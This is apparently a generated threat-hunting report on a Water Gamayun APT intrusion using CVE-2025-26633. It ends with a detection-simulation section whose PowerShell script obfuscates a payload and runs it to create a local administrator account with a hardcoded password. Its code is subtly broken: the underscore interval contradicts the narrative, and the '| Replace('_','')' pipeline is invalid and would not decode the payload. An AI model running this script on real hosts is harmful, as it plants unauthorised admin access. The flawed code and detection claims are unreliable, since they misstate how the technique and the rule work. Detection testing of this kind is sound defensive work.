Zscaler Threat Hunting Exposes and Reconstructs the Water Gamayun APT Campaign

Summary

The report covers a multi-stage intrusion attributed to the Water Gamayun APT group that exploits a zero-day MMC vulnerability (CVE-2025-26633) to deliver PowerShell payloads in a double-extension RAR archive.

Investigation

Zscaler reconstructed the kill chain from a Bing search redirect to a compromised site, download of a .pdf.rar file, exploitation of MSC EvilTwin, staged PowerShell scripts, and execution of the ItunesC.exe backdoor.

Mitigation

Guidance includes monitoring double-extension archives, inspecting redirects, detecting encoded PowerShell commands, and blocking the malicious IP and domains.

Response

On detection, alert on mmc.exe spawning PowerShell with -EncodedCommand, quarantine the file, block outbound connections to 103.246.147.17, and activate incident response procedures.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

• Attack Narrative & Commands:
  The attacker, leveraging Water Gamayun’s methodology, prepares a malicious PowerShell payload that writes a new local admin user and adds it to the Administrators group. To hide the payload, the attacker:

  1. Writes the PowerShell script in clear text.
  2. Encodes it to UTF‑16LE Base64.
  3. Inserts an underscore (_) after every 4 characters to inflate entropy.
  4. Chains a |Replace('_','') operation so that the runtime PowerShell removes the underscores before decoding, matching the detection signature.

  The final execution command is:

  powershell.exe -EncodedCommand <Base64StringWithUnderscores> | Replace('_','')

  This exact command line satisfies the Sigma rule’s two conditions (-EncodedCommand and |Replace('_','')), generating Sysmon EventID 1 and Security EventID 4688 entries that the rule will flag.

• Regression Test Script:
  The script below automates the creation of the obfuscated payload and executes it. It can be run on any Windows host with PowerShell 5.1+.

  # Water Gamayun style PowerShell obfuscation simulation
  # Step 1: Define the malicious PowerShell payload (adds a local admin user)
  $payload = @'
  $user = "tempAdmin"
  $pwd  = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force
  New-LocalUser -Name $user -Password $pwd -FullName "Temp Admin" -Description "Test admin account"
  Add-LocalGroupMember -Group "Administrators" -Member $user
  '@
  
  # Step 2: Encode to UTF-16LE and then Base64
  $bytes   = [System.Text.Encoding]::Unicode.GetBytes($payload)
  $b64     = [Convert]::ToBase64String($bytes)
  
  # Step 3: Inject underscores every 8 characters (simulating the group's pattern)
  $b64Underscored = ($b64 -split '(.{8})' | Where-Object {$_} | ForEach-Object { $_ + '_' }) -join ''
  
  # Step 4: Execute with the required Replace('_','') pipeline
  powershell.exe -EncodedCommand $b64Underscored | Replace('_','')

• Cleanup Commands:
  The following commands remove the test user and restore the environment.

  # Cleanup: Remove the temporary admin account created by the test
  $user = "tempAdmin"
  if (Get-LocalUser -Name $user -ErrorAction SilentlyContinue) {
      Remove-LocalUser -Name $user
      Write-Host "Deleted test user $user."
  } else {
      Write-Host "Test user $user does not exist."
  }